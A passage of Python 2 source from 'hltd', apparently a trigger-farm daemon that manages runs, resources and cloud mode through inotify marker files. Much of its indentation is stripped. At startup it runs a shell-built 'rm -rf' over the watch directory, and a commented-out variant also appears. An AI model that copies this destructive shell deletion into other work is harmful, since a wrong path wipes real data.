#doc = {runNumber:runObj}
#self.runs.append(doc)
self.runs.append(runObj)
def remove(self,runNumber):
#runs = map(lambda x: x.keys()[0]==runNumber)
runs = filter(lambda x: x.runnumber==runNumber,self.runs)
if len(runs)>1:
logger.error("Multiple runs entries for "+str(runNumber)+" were found while removing run")
for run in runs[:]: self.runs.pop(self.runs.index(run))
def getOngoingRuns(self):
#return map(lambda x: x[x.keys()[0]], filter(lambda x: x.is_ongoing_run==True,self.runs))
return filter(lambda x: x.is_ongoing_run==True,self.runs)
def getQuarantinedRuns(self):
return filter(lambda x: x.pending_shutdown==True,self.runs)
def getActiveRuns(self):
#return map(lambda x.runnumber: x, self.runs)
return self.runs[:]
def getActiveRunNumbers(self):
return map(lambda x: x.runnumber, self.runs)
def getLastRun(self):
try:
return self.runs[-1]
except:
return None
def getLastOngoingRun(self):
try:
return self.getOngoingRuns()[-1]
except:
return None
def getRun(self,runNumber):
try:
return filter(lambda x: x.runnumber==runNumber,self.runs)[0]
except:
return None
def isLatestRun(self,runObj):
#TODO:test
return self.runs[-1] == runObj
#return len(filter(lambda x: x.runnumber>runObj.runnumber,self.runs))==0
def getStateDoc(self):
docArray = []
for runObj in self.runs:
docArray.append({'run':runObj.runnumber,'totalRes':runObj.n_used,'qRes':runObj.n_quarantined,'ongoing':runObj.is_ongoing_run,'errors':runObj.num_errors})
return docArray
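
# --- illustrative sketch (not part of hltd) -----------------------------------
# A minimal usage example of RunList (under Python 2 semantics, where
# filter/map return lists), using a stand-in object that carries just the
# attributes the class reads:
def _example_runlist_usage():
    class _FakeRun(object):
        def __init__(self, nr):
            self.runnumber = nr
            self.is_ongoing_run = True
            self.pending_shutdown = False
    rl = RunList()
    rl.add(_FakeRun(100))
    rl.add(_FakeRun(101))
    assert rl.getActiveRunNumbers() == [100, 101]
    assert rl.getLastRun().runnumber == 101
    rl.remove(100)
    assert rl.getActiveRunNumbers() == [101]
# -------------------------------------------------------------------------------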
class RunRanger:
def __init__(self,instance):
self.inotifyWrapper = InotifyWrapper(self)
self.instance = instance
def register_inotify_path(self,path,mask):
self.inotifyWrapper.registerPath(path,mask)
def start_inotify(self):
self.inotifyWrapper.start()
def stop_inotify(self):
self.inotifyWrapper.stop()
self.inotifyWrapper.join()
logger.info("RunRanger: Inotify wrapper shutdown done")
def process_IN_CREATE(self, event):
nr=0
global runList
global cloud_mode
global entering_cloud_mode
global exiting_cloud_mode
global abort_cloud_mode
global resources_blocked_flag
global cached_pending_run
global disabled_resource_allocation
global masked_resources
fullpath = event.fullpath
logger.info('RunRanger: event '+fullpath)
dirname=fullpath[fullpath.rfind("/")+1:]
logger.info('RunRanger: new filename '+dirname)
if dirname.startswith('run'):
if dirname.endswith('.reprocess'):
#reprocessing triggered
dirname = dirname[:dirname.rfind('.reprocess')]
fullpath = fullpath[:fullpath.rfind('.reprocess')]
logger.info('Triggered reprocessing of '+ dirname)
try:os.unlink(event.fullpath)
except:
try:os.rmdir(event.fullpath)
except:pass
if os.path.islink(fullpath):
logger.info('directory ' + fullpath + ' is link. Ignoring this run')
return
if not os.path.isdir(fullpath):
logger.info(fullpath +' is a file. A directory is needed to start a run.')
return
nr=int(dirname[3:])
if nr!=0:
# the dqm BU processes a run if the "global run file" is not mandatory or if the run is a global run
is_global_run = os.path.exists(fullpath[:fullpath.rfind("/")+1] + dqm_globalrun_filepattern.format(str(nr).zfill(conf.run_number_padding)))
dqm_processing_criterion = (not conf.dqm_globallock) or (conf.role != 'bu') or (is_global_run)
if (not conf.dqm_machine) or dqm_processing_criterion:
try:
logger.info('new run '+str(nr))
#terminate quarantined runs
for run in runList.getQuarantinedRuns():
#run shutdown waiting for scripts to finish
run.startShutdown(True,False)
time.sleep(.1)
resources_blocked_flag=False
if cloud_mode==True:
logger.info("received new run notification in CLOUD mode. Ignoring new run.")
#remember this run and attempt to continue it once hltd exits the cloud mode
cached_pending_run = fullpath
os.rmdir(fullpath)
return
if conf.role == 'fu':
bu_dir = bu_disk_list_ramdisk_instance[0]+'/'+dirname
try:
os.symlink(bu_dir+'/jsd',fullpath+'/jsd')
except:
if not conf.dqm_machine:
logger.warning('jsd directory symlink error, continuing without creating link')
pass
else:
bu_dir = ''
#check if this run is a duplicate
if runList.getRun(nr)!=None:
raise Exception("Attempting to create duplicate run "+str(nr))
# in case of a DQM machines create an EoR file
if conf.dqm_machine and conf.role == 'bu':
for run in runList.getOngoingRuns():
EoR_file_name = run.dirname + '/' + 'run' + str(run.runnumber).zfill(conf.run_number_padding) + '_ls0000_EoR.jsn'
if run.is_ongoing_run and not os.path.exists(EoR_file_name):
# create an EoR file that will trigger all the running jobs to exit nicely
open(EoR_file_name, 'w').close()
run = Run(nr,fullpath,bu_dir,self.instance)
if not run.inputdir_exists and conf.role=='fu':
logger.info('skipping '+ fullpath + ' with raw input directory missing')
shutil.rmtree(fullpath)
del(run)
return
resource_lock.acquire()
runList.add(run)
try:
if conf.role=='fu' and not entering_cloud_mode and not has_active_resources():
logger.error('trying to start a run '+str(run.runnumber)+ ' without any available resources - this requires manual intervention !')
                        except Exception as ex:
logger.exception(ex)
if run.AcquireResources(mode='greedy'):
run.CheckTemplate()
run.Start()
else:
#BU mode: failed to get blacklist
runList.remove(nr)
resource_lock.release()
del(run)
return
resource_lock.release()
if conf.role == 'bu' and conf.instance != 'main':
logger.info('creating run symlink in main ramdisk directory')
main_ramdisk = os.path.dirname(os.path.normpath(conf.watch_directory))
os.symlink(fullpath,os.path.join(main_ramdisk,os.path.basename(fullpath)))
except OSError as ex:
logger.error("RunRanger: "+str(ex)+" "+ex.filename)
logger.exception(ex)
except Exception as ex:
logger.error("RunRanger: unexpected exception encountered in forking hlt slave")
logger.exception(ex)
try:resource_lock.release()
except:pass
elif dirname.startswith('emu'):
nr=int(dirname[3:])
if nr!=0:
try:
"""
start a new BU emulator run here - this will trigger the start of the HLT run
"""
bu_emulator.startNewRun(nr)
except Exception as ex:
logger.info("exception encountered in starting BU emulator run")
logger.info(ex)
os.remove(fullpath)
elif dirname.startswith('end'):
            # need to check if the stripped name is actually an integer
            # to serve as run number
if dirname[3:].isdigit():
nr=int(dirname[3:])
if nr!=0:
try:
endingRun = runList.getRun(nr)
if endingRun==None:
logger.warning('request to end run '+str(nr)
+' which does not exist')
os.remove(fullpath)
else:
logger.info('end run '+str(nr))
#remove from runList to prevent intermittent restarts
#lock used to fix a race condition when core files are being moved around
                            endingRun.is_ongoing_run=False
time.sleep(.1)
if conf.role == 'fu':
endingRun.StartWaitForEnd()
if bu_emulator and bu_emulator.runnumber != None:
bu_emulator.stop()
#logger.info('run '+str(nr)+' removing end-of-run marker')
#os.remove(fullpath)
except Exception as ex:
logger.info("exception encountered when waiting hlt run to end")
logger.info(ex)
else:
logger.error('request to end run '+str(nr)
+' which is an invalid run number - this should '
+'*never* happen')
else:
                logger.error('request to end run '+dirname[3:]
                             +' which is NOT a run number - this should '
                             +'*never* happen')
elif dirname.startswith('herod') or dirname.startswith('tsunami'):
os.remove(fullpath)
if conf.role == 'fu':
global q_list
logger.info("killing all CMSSW child processes")
for run in runList.getActiveRuns():
run.Shutdown(True,False)
time.sleep(.2)
#clear all quarantined cores
for cpu in q_list:
try:
logger.info('Clearing quarantined resource '+cpu)
os.rename(quarantined+cpu,idles+cpu)
except:
logger.info('Quarantined resource was already cleared: '+cpu)
q_list=[]
elif conf.role == 'bu':
for run in runList.getActiveRuns():
run.createEmptyEoRMaybe()
run.ShutdownBU()
#delete input and output BU directories
if dirname.startswith('tsunami'):
logger.info('tsunami approaching: cleaning all ramdisk and output run data')
cleanup_bu_disks(None,True,True)
#contact any FU that appears alive
boxdir = conf.resource_base +'/boxes/'
try:
dirlist = os.listdir(boxdir)
current_time = time.time()
logger.info("sending herod to child FUs")
for name in dirlist:
if name == os.uname()[1]:continue
age = current_time - os.path.getmtime(boxdir+name)
logger.info('found box '+name+' with keepalive age '+str(age))
if age < 20:
try:
connection = httplib.HTTPConnection(name, conf.cgi_port - conf.cgi_instance_port_offset,timeout=5)
time.sleep(0.05)
connection.request("GET",'cgi-bin/herod_cgi.py')
time.sleep(0.1)
response = connection.getresponse()
except Exception as ex:
logger.error("exception encountered in contacting resource "+str(name))
logger.exception(ex)
logger.info("sent herod to all child FUs")
except Exception as ex:
logger.error("exception encountered in contacting resources")
logger.info(ex)
elif dirname.startswith('cleanoutput'):
os.remove(fullpath)
nlen = len('cleanoutput')
if len(dirname)==nlen:
                logger.info('cleaning output (all run data)')
cleanup_bu_disks(None,False,True)
else:
try:
rn = int(dirname[nlen:])
logger.info('cleaning output (only for run '+str(rn)+')')
cleanup_bu_disks(rn,False,True)
except:
logger.error('Could not parse '+dirname)
elif dirname.startswith('cleanramdisk'):
os.remove(fullpath)
nlen = len('cleanramdisk')
if len(dirname)==nlen:
                logger.info('cleaning ramdisk (all run data)')
cleanup_bu_disks(None,True,False)
else:
try:
rn = int(dirname[nlen:])
logger.info('cleaning ramdisk (only for run '+str(rn)+')')
cleanup_bu_disks(rn,True,False)
except:
logger.error('Could not parse '+dirname)
elif dirname.startswith('populationcontrol'):
if len(runList.runs)>0:
logger.info("terminating all ongoing runs via cgi interface (populationcontrol): "+str(runList.getActiveRunNumbers()))
for run in runList.getActiveRuns():
if conf.role=='fu':
run.Shutdown(True,True)
elif conf.role=='bu':
run.ShutdownBU()
logger.info("terminated all ongoing runs via cgi interface (populationcontrol)")
os.remove(fullpath)
elif dirname.startswith('harakiri') and conf.role == 'fu':
os.remove(fullpath)
pid=os.getpid()
logger.info('asked to commit seppuku:'+str(pid))
try:
logger.info('sending signal '+str(SIGKILL)+' to myself:'+str(pid))
retval = os.kill(pid, SIGKILL)
                logger.info('sent SIGKILL to myself:'+str(pid))
                logger.info('got return '+str(retval)+', waiting to die...and hope for the best')
except Exception as ex:
logger.error("exception in committing harakiri - the blade is not sharp enough...")
logger.error(ex)
elif dirname.startswith('quarantined'):
try:
                os.remove(fullpath)
except:
pass
if dirname[11:].isdigit():
nr=int(dirname[11:])
if nr!=0:
try:
run = runList.getRun(nr)
if run.checkQuarantinedLimit():
if runList.isLatestRun(run):
logger.info('reached quarantined limit - pending Shutdown for run:'+str(nr))
run.pending_shutdown=True
else:
logger.info('reached quarantined limit - initiating Shutdown for run:'+str(nr))
run.startShutdown(True,False)
except Exception as ex:
logger.exception(ex)
elif dirname.startswith('suspend') and conf.role == 'fu':
logger.info('suspend mountpoints initiated')
replyport = int(dirname[7:]) if dirname[7:].isdigit()==True else conf.cgi_port
global suspended
suspended=True
#terminate all ongoing runs
for run in runList.getActiveRuns():
run.Shutdown(True,True)
time.sleep(.5)
#local request used in case of stale file handle
if replyport==0:
umount_success = cleanup_mountpoints()
try:os.remove(fullpath)
except:pass
suspended=False
logger.info("Remount requested locally is performed.")
return
umount_success = cleanup_mountpoints(remount=False)
if umount_success==False:
time.sleep(1)
logger.error("Suspend initiated from BU failed, trying again...")
#notifying itself again
try:os.remove(fullpath)
except:pass
fp = open(fullpath,"w+")
fp.close()
return
#find out BU name from bus_config
bu_name=None
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if os.path.exists(bus_config):
for line in open(bus_config):
bu_name=line.split('.')[0]
break
#first report to BU that umount was done
try:
if bu_name==None:
logger.fatal("No BU name was found in the bus.config file. Leaving mount points unmounted until the hltd service restart.")
os.remove(fullpath)
return
connection = httplib.HTTPConnection(bu_name, replyport+20,timeout=5)
connection.request("GET",'cgi-bin/report_suspend_cgi.py?host='+os.uname()[1])
response = connection.getresponse()
except Exception as ex:
logger.error("Unable to report suspend state to BU "+str(bu_name)+':'+str(replyport+20))
logger.exception(ex)
#loop while BU is not reachable
while True:
try:
#reopen bus.config in case is modified or moved around
bu_name=None
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if os.path.exists(bus_config):
try:
for line in open(bus_config):
bu_name=line.split('.')[0]
break
except:
                            logger.info('failed to read bus.config, retrying')
time.sleep(5)
continue
if bu_name==None:
                        logger.info('BU name not found in bus.config, retrying')
time.sleep(5)
continue
logger.info('checking if BU hltd is available...')
connection = httplib.HTTPConnection(bu_name, replyport,timeout=5)
connection.request("GET",'cgi-bin/getcwd_cgi.py')
response = connection.getresponse()
logger.info('BU hltd is running !...')
#if we got here, the service is back up
break
except Exception as ex:
try:
logger.info('Failed to contact BU hltd service: ' + str(ex.args[0]) +" "+ str(ex.args[1]))
except:
logger.info('Failed to contact BU hltd service '+str(ex))
time.sleep(5)
#mount again
cleanup_mountpoints()
try:os.remove(fullpath)
except:pass
suspended=False
logger.info("Remount is performed")
elif dirname=='stop' and conf.role == 'fu':
logger.fatal("Stopping all runs..")
masked_resources=True
            #make sure the inotify acquire path does not run while we are here
resource_lock.acquire()
disabled_resource_allocation=True
resource_lock.release()
#shut down any quarantined runs
try:
for run in runList.getQuarantinedRuns():
run.Shutdown(True,False)
listOfActiveRuns = runList.getActiveRuns()
for run in listOfActiveRuns:
if not run.pending_shutdown:
if len(run.online_resource_list)==0:
run.Shutdown(True,False)
else:
resource_lock.acquire()
run.Stop()
resource_lock.release()
time.sleep(.1)
except Exception as ex:
logger.fatal("Unable to stop run(s)")
logger.exception(ex)
disabled_resource_allocation=False
try:resource_lock.release()
except:pass
os.remove(fullpath)
elif dirname.startswith('exclude') and conf.role == 'fu':
#service on this machine is asked to be excluded for cloud use
if cloud_mode:
logger.info('already in cloud mode')
os.remove(fullpath)
return
else:
logger.info('machine exclude initiated')
if is_cloud_inactive()>=100:
logger.error("Unable to switch to cloud mode (igniter script error)")
os.remove(fullpath)
return
            #make sure inotify does not acquire resources while we are here
resource_lock.acquire()
cloud_mode=True
entering_cloud_mode=True
resource_lock.release()
time.sleep(.1)
#shut down any quarantined runs
try:
for run in runList.getQuarantinedRuns():
run.Shutdown(True,False)
requested_stop=False
listOfActiveRuns = runList.getActiveRuns()
for run in listOfActiveRuns:
if not run.pending_shutdown:
if len(run.online_resource_list)==0:
run.Shutdown(True,False)
else:
resource_lock.acquire()
requested_stop=True
run.Stop()
resource_lock.release()
time.sleep(.1)
resource_lock.acquire()
if requested_stop==False:
#no runs present, switch to cloud mode immediately
entering_cloud_mode=False
move_resources_to_cloud()
resource_lock.release()
ignite_cloud()
logger.info("cloud is on? : "+str(is_cloud_inactive()==False))
except Exception as ex:
logger.fatal("Unable to clear runs. Will not enter VM mode.")
logger.exception(ex)
entering_cloud_mode=False
cloud_mode=False
try:resource_lock.release()
except:pass
os.remove(fullpath)
elif dirname.startswith('include') and conf.role == 'fu':
#masked_resources=False
if cloud_mode==False:
logger.error('received notification to exit from cloud but machine is not in cloud mode!')
os.remove(fullpath)
if not is_cloud_inactive():
logger.info('cloud scripts are running, trying to stop')
extinguish_cloud()
return
resource_lock.acquire()
if entering_cloud_mode:
abort_cloud_mode=True
resource_lock.release()
os.remove(fullpath)
return
resource_lock.release()
#run stop cloud notification
exiting_cloud_mode=True
if is_cloud_inactive():
logger.warning('received command to deactivate cloud, but cloud scripts are not running!')
extinguish_cloud()
while True:
last_status = is_cloud_inactive()
if last_status==0: #state: running
logger.info('cloud scripts are still active')
time.sleep(1)
continue
else:
logger.info('cloud scripts have been deactivated')
if last_status>1:
logger.warning('Received error code from cloud igniter script. Switching off cloud mode')
resource_lock.acquire()
resources_blocked_flag=True
cloud_mode=False
cleanup_resources()
resource_lock.release()
break
exiting_cloud_mode=False
os.remove(fullpath)
if cached_pending_run != None:
#create last pending run received during the cloud mode
time.sleep(5) #let core file notifications run
os.mkdir(cached_pending_run)
cached_pending_run = None
else: time.sleep(2)
logger.info('cloud mode in hltd has been switched off')
elif dirname.startswith('logrestart'):
#hook to restart logcollector process manually
restartLogCollector(self.instance)
os.remove(fullpath)
logger.debug("RunRanger completed handling of event "+fullpath)
def process_default(self, event):
logger.info('RunRanger: event '+event.fullpath+' type '+str(event.mask))
filename=event.fullpath[event.fullpath.rfind("/")+1:]
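
# --- illustrative sketch (not part of hltd) -----------------------------------
# RunRanger above is driven entirely by marker files dropped into the watch
# directory. A condensed sketch of the prefix dispatch it implements; ordering
# and exact-match details (e.g. 'stop' is compared with ==) differ slightly in
# the real handler, and the handlers themselves are omitted:
def _example_ranger_dispatch(name):
    prefixes = ['run', 'emu', 'end', 'herod', 'tsunami', 'cleanoutput',
                'cleanramdisk', 'populationcontrol', 'harakiri', 'quarantined',
                'suspend', 'stop', 'exclude', 'include', 'logrestart']
    for p in prefixes:
        if name.startswith(p):
            return p
    return None
# -------------------------------------------------------------------------------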
class ResourceRanger:
def __init__(self):
self.inotifyWrapper = InotifyWrapper(self)
self.managed_monitor = system_monitor()
self.managed_monitor.start()
self.regpath = []
def register_inotify_path(self,path,mask):
self.inotifyWrapper.registerPath(path,mask)
self.regpath.append(path)
def start_inotify(self):
self.inotifyWrapper.start()
def stop_managed_monitor(self):
self.managed_monitor.stop()
self.managed_monitor.join()
logger.info("ResourceRanger: managed monitor shutdown done")
def stop_inotify(self):
self.inotifyWrapper.stop()
self.inotifyWrapper.join()
logger.info("ResourceRanger: Inotify wrapper shutdown done")
def process_IN_MOVED_TO(self, event):
logger.debug('ResourceRanger-MOVEDTO: event '+event.fullpath)
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
try:
resourcepath=event.fullpath[1:event.fullpath.rfind("/")]
resourcestate=resourcepath[resourcepath.rfind("/")+1:]
resourcename=event.fullpath[event.fullpath.rfind("/")+1:]
resource_lock.acquire()
if not (resourcestate == 'online' or resourcestate == 'cloud'
or resourcestate == 'quarantined'):
logger.debug('ResourceNotifier: new resource '
+resourcename
+' in '
+resourcepath
+' state '
+resourcestate
)
if cloud_mode and not entering_cloud_mode and not exiting_cloud_mode and not abort_cloud_mode and not disabled_resource_allocation:
time.sleep(1)
                    logger.info('detected resource moved to non-cloud resource dir while already switched to cloud mode. Deactivating cloud.')
with open(os.path.join(conf.watch_directory,'include'),'w+') as fobj:
pass
resource_lock.release()
time.sleep(1)
return
run = runList.getLastOngoingRun()
if run is not None:
logger.info("ResourceRanger: found active run "+str(run.runnumber)+ " when received inotify MOVED event for "+event.fullpath)
"""grab resources that become available
#@@EM implement threaded acquisition of resources here
"""
#find all idle cores
idlesdir = '/'+resourcepath
try:
reslist = os.listdir(idlesdir)
except Exception as ex:
logger.info("exception encountered in looking for resources")
logger.exception(ex)
#put inotify-ed resource as the first item
fileFound=False
for resindex,resname in enumerate(reslist):
fileFound=False
if resname == resourcename:
fileFound=True
if resindex != 0:
firstitem = reslist[0]
reslist[0] = resourcename
reslist[resindex] = firstitem
break
if fileFound==False:
#inotified file was already moved earlier
resource_lock.release()
return
#acquire sufficient cores for a multithreaded process start
#returns whether it can be matched to existing online resource or not
matchedList = run.MatchResource(reslist)
if matchedList:
#matched with previous resource (restarting process)
acquired_sufficient = True
res = run.AcquireResource(matchedList,resourcestate)
else:
resourcenames = []
for resname in reslist:
if len(resourcenames) < nstreams:
resourcenames.append(resname)
else:
break
acquired_sufficient = False
if len(resourcenames) == nstreams:
acquired_sufficient = True
res = run.AcquireResource(resourcenames,resourcestate)
if acquired_sufficient:
logger.info("ResourceRanger: acquired resource(s) "+str(res.cpu))
run.StartOnResource(res)
logger.info("ResourceRanger: started process on resource "
+str(res.cpu))
else:
#if no run is active, move (x N threads) files from except to idle to be picked up for the next run
#todo: debug,write test for this...
if resourcestate == 'except':
idlesdir = '/'+resourcepath
try:
reslist = os.listdir(idlesdir)
#put inotify-ed resource as the first item
fileFound=False
for resindex,resname in enumerate(reslist):
if resname == resourcename:
fileFound=True
if resindex != 0:
firstitem = reslist[0]
reslist[0] = resourcename
reslist[resindex] = firstitem
break
if fileFound==False:
#inotified file was already moved earlier
resource_lock.release()
return
resourcenames = []
for resname in reslist:
if len(resourcenames) < nstreams:
resourcenames.append(resname)
else:
break
if len(resourcenames) == nstreams:
for resname in resourcenames:
os.rename(broken+resname,idles+resname)
except Exception as ex:
logger.info("exception encountered in looking for resources in except")
logger.info(ex)
elif resourcestate=="cloud":
#check if cloud mode was initiated, activate if necessary
if conf.role=='fu' and cloud_mode==False:
time.sleep(1)
                        logger.info('detected core moved to cloud resources. Triggering cloud activation sequence.')
with open(os.path.join(conf.watch_directory,'exclude'),'w+') as fobj:
pass
time.sleep(1)
except Exception as ex:
logger.error("exception in ResourceRanger")
logger.error(ex)
try:
resource_lock.release()
except:pass
def process_IN_MODIFY(self, event):
logger.debug('ResourceRanger-MODIFY: event '+event.fullpath)
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
try:
#this should be error (i.e. bus.confg should not be modified during a run)
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if event.fullpath == bus_config:
logger.warning("automatic remounting on changed bus.config is no longer supported. restart hltd to remount")
if False:
if self.managed_monitor:
self.managed_monitor.stop()
self.managed_monitor.join()
cleanup_mountpoints()
if self.managed_monitor:
self.managed_monitor = system_monitor()
self.managed_monitor.start()
logger.info("ResouceRanger: managed monitor is "+str(self.managed_monitor))
except Exception as ex:
logger.error("exception in ResourceRanger")
logger.error(ex)
def process_IN_CREATE(self, event):
logger.debug('ResourceRanger-CREATE: event '+event.fullpath)
if conf.dqm_machine:return
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
if basename=='blacklist':return
if basename.startswith('test'):return
if conf.role!='bu' or basename.endswith(os.uname()[1]):
return
try:
resourceage = os.path.getmtime(event.fullpath)
resource_lock.acquire()
lrun = runList.getLastRun()
newRes = None
if lrun!=None:
if lrun.checkStaleResourceFile(event.fullpath):
logger.error("Run "+str(lrun.runnumber)+" notification: skipping resource "+basename+" which is stale")
resource_lock.release()
return
logger.info('Try attaching FU resource: last run is '+str(lrun.runnumber))
newRes = lrun.maybeNotifyNewRun(basename,resourceage)
resource_lock.release()
if newRes:
newRes.NotifyNewRun(lrun.runnumber)
except Exception as ex:
logger.exception(ex)
try:resource_lock.release()
except:pass
def process_default(self, event):
logger.debug('ResourceRanger: event '+event.fullpath +' type '+ str(event.mask))
filename=event.fullpath[event.fullpath.rfind("/")+1:]
def process_IN_CLOSE_WRITE(self, event):
logger.debug('ResourceRanger-IN_CLOSE_WRITE: event '+event.fullpath)
global machine_blacklist
resourcepath=event.fullpath[0:event.fullpath.rfind("/")]
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
if conf.role=='fu':return
if basename == os.uname()[1]:return
if basename.startswith('test'):return
if basename == 'blacklist':
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'r') as fi:
try:
machine_blacklist = json.load(fi)
except:
pass
if resourcepath.endswith('boxes'):
global boxinfoFUMap
if basename in machine_blacklist:
try:boxinfoFUMap.remove(basename)
except:pass
else:
current_time = time.time()
current_datetime = datetime.datetime.utcfromtimestamp(current_time)
emptyBox=False
try:
infile = fileHandler(event.fullpath)
if infile.data=={}:emptyBox=True
#check which time is later (in case of small clock skew and small difference)
if current_datetime > dateutil.parser.parse(infile.data['fm_date']):
dt = (current_datetime - dateutil.parser.parse(infile.data['fm_date'])).seconds
else:
dt = -(dateutil.parser.parse(infile.data['fm_date'])-current_datetime).seconds
if dt > 5:
logger.warning('setting stale flag for resource '+basename + ' which is '+str(dt)+' seconds behind')
#should be << 1s if NFS is responsive, set stale handle flag
infile.data['detectedStaleHandle']=True
elif dt < -5:
logger.error('setting stale flag for resource '+basename + ' which is '+str(dt)+' seconds ahead (clock skew)')
infile.data['detectedStaleHandle']=True
boxinfoFUMap[basename] = [infile.data,current_time,True]
except Exception as ex:
if not emptyBox:
logger.error("Unable to read of parse boxinfo file "+basename)
logger.exception(ex)
else:
logger.warning("got empty box file "+basename)
try:
boxinfoFUMap[basename][2]=False
except:
#boxinfo entry doesn't exist yet
boxinfoFUMap[basename]=[None,current_time,False]
def checkNotifiedBoxes(self,runNumber):
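        # returns (check_ok, run_found): (False,False) when box data is missing or
        # failed to parse, (True,True) once the run number appears in some FU's
        # activeRuns, and (True,False) when all recent box data are valid but no
        # box lists the run yet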
keys = boxinfoFUMap.keys()
c_time = time.time()
for key in keys:
#if key==thishost:continue #checked in inotify thread
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:
#key deleted
return False,False
if c_time - etime > 20:continue
#parsing or file access, check failed
if lastStatus==False: return False,False
try:
#run is found in at least one box
if runNumber in edata['activeRuns']:return True,True
except:
#invalid boxinfo data
return False,False
#all box data are valid, run not found
return True,False
def checkBoxes(self,runNumber):
checkSuccessful=True
runFound=False
ioErrCount=0
valErrCount=0
files = os.listdir(self.regpath[-1])
c_time = time.time()
for file in files:
if file == thishost:continue
#ignore file if it is too old (FU with a problem)
            # the boxes directory is the last registered inotify path
            filename = os.path.join(self.regpath[-1],file)
if c_time - os.path.getmtime(filename) > 20:continue
try:
with open(filename,'r') as fp:
doc = json.load(fp)
except IOError as ex:
checkSuccessful=False
break
except ValueError as ex:
checkSuccessful=False
break
except Exception as ex:
logger.exception(ex)
checkSuccessful=False
                break
try:
if runNumber in doc['activeRuns']:
runFound=True
                    break
except Exception as ex:
logger.exception(ex)
checkSuccessful=False
break
return checkSuccessful,runFound
class hltd(Daemon2,object):
def __init__(self, instance):
self.instance=instance
Daemon2.__init__(self,'hltd',instance,'hltd')
def stop(self):
#read configuration file
try:
setFromConf(self.instance)
except Exception as ex:
print " CONFIGURATION error:",str(ex),"(check configuration file) [ \033[1;31mFAILED\033[0;39m ]"
sys.exit(4)
if self.silentStatus():
try:
if os.path.exists(conf.watch_directory+'/populationcontrol'):
os.remove(conf.watch_directory+'/populationcontrol')
fp = open(conf.watch_directory+'/populationcontrol','w+')
fp.close()
count = 10
while count:
os.stat(conf.watch_directory+'/populationcontrol')
if count==10:
sys.stdout.write(' o.o')
else:
sys.stdout.write('o.o')
sys.stdout.flush()
time.sleep(.5)
count-=1
except OSError, err:
time.sleep(.1)
pass
except IOError, err:
time.sleep(.1)
pass
super(hltd,self).stop()
def run(self):
"""
if role is not defined in the configuration (which it shouldn't)
infer it from the name of the machine
"""
#read configuration file
setFromConf(self.instance)
logger.info(" ")
logger.info(" ")
logger.info("[[[[ ---- hltd start : instance " + self.instance + " ---- ]]]]")
logger.info(" ")
if conf.enabled==False:
logger.warning("Service is currently disabled.")
sys.exit(1)
if conf.role == 'fu':
"""
cleanup resources
"""
global cloud_mode
is_in_cloud = len(os.listdir(cloud))>0
while True:
#switch to cloud mode if cloud files are found (e.g. machine rebooted while in cloud)
if is_in_cloud:
logger.warning('found cores in cloud. this session will start in the cloud mode')
try:
move_resources_to_cloud()
except:
pass
cloud_mode=True
if is_cloud_inactive():
ignite_cloud()
break
if cleanup_resources()==True:break
time.sleep(0.1)
logger.warning("retrying cleanup_resources")
"""
recheck mount points
this is done at start and whenever the file /etc/appliance/bus.config is modified
mount points depend on configuration which may be updated (by runcontrol)
(notice that hltd does not NEED to be restarted since it is watching the file all the time)
"""
cleanup_mountpoints()
calculate_threadnumber()
try:
os.makedirs(conf.watch_directory)
except:
pass
#recursively remove any stale run data and other commands in the FU watch directory
#if conf.watch_directory.strip()!='/':
# p = subprocess.Popen("rm -rf " + conf.watch_directory.strip()+'/{run*,end*,quarantined*,exclude,include,suspend*,populationcontrol,herod,logrestart,emu*}',shell=True)
# p.wait()
if conf.watch_directory.startswith('/fff'):
p = subprocess.Popen("rm -rf " + conf.watch_directory+'/*',shell=True)
p.wait()
global fu_watchdir_is_mountpoint
if os.path.ismount(conf.watch_directory):fu_watchdir_is_mountpoint=True
#switch to cloud mode if active and hltd did not have cores in cloud directory in the last session
if not is_in_cloud:
if not is_cloud_inactive():
logger.warning("cloud is on on this host at hltd startup, switching to cloud mode")
move_resources_to_cloud()
cloud_mode=True
if conf.role == 'bu':
global machine_blacklist
#update_success,machine_blacklist=updateBlacklist()
machine_blacklist=[]
global ramdisk_submount_size
if self.instance == 'main':
#if there are other instance mountpoints in ramdisk, they will be subtracted from size estimate
ramdisk_submount_size = submount_size(conf.watch_directory)
"""
the line below is a VERY DIRTY trick to address the fact that
BU resources are dynamic hence they should not be under /etc
"""
conf.resource_base = conf.watch_directory+'/appliance' if conf.role == 'bu' else conf.resource_base
#@SM:is running from symbolic links still needed?
watch_directory = os.readlink(conf.watch_directory) if os.path.islink(conf.watch_directory) else conf.watch_directory
resource_base = os.readlink(conf.resource_base) if os.path.islink(conf.resource_base) else conf.resource_base
global runList
runList = RunList()
if conf.use_elasticsearch == True:
time.sleep(.2)
restartLogCollector(self.instance)
#start boxinfo elasticsearch updater
global nsslock
global boxInfo
boxInfo = None
if conf.role == 'bu':
try:os.makedirs(os.path.join(watch_directory,'appliance/dn'))
except:pass
try:os.makedirs(os.path.join(watch_directory,'appliance/boxes'))
except:pass
if conf.use_elasticsearch == True:
boxInfo = BoxInfoUpdater(watch_directory,conf,nsslock,boxdoc_version)
boxInfo.start()
runRanger = RunRanger(self.instance)
runRanger.register_inotify_path(watch_directory,inotify.IN_CREATE)
runRanger.start_inotify()
logger.info("started RunRanger - watch_directory " + watch_directory)
appliance_base=resource_base
if resource_base.endswith('/'):
resource_base = resource_base[:-1]
if resource_base.rfind('/')>0:
appliance_base = resource_base[:resource_base.rfind('/')]
rr = ResourceRanger()
try:
if conf.role == 'bu':
imask = inotify.IN_CLOSE_WRITE | inotify.IN_DELETE | inotify.IN_CREATE | inotify.IN_MOVED_TO
rr.register_inotify_path(resource_base, imask)
rr.register_inotify_path(resource_base+'/boxes', imask)
else:
#status file for cloud
#with open(os.path.join(watch_directory,'mode'),'w') as fp:
                #    json.dump({"mode":"hlt"},fp)
#
imask_appl = inotify.IN_MODIFY
imask = inotify.IN_MOVED_TO
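                # FU watches: the appliance dir for bus.config edits (IN_MODIFY,
                # handled by process_IN_MODIFY) and the idle/cloud/except resource
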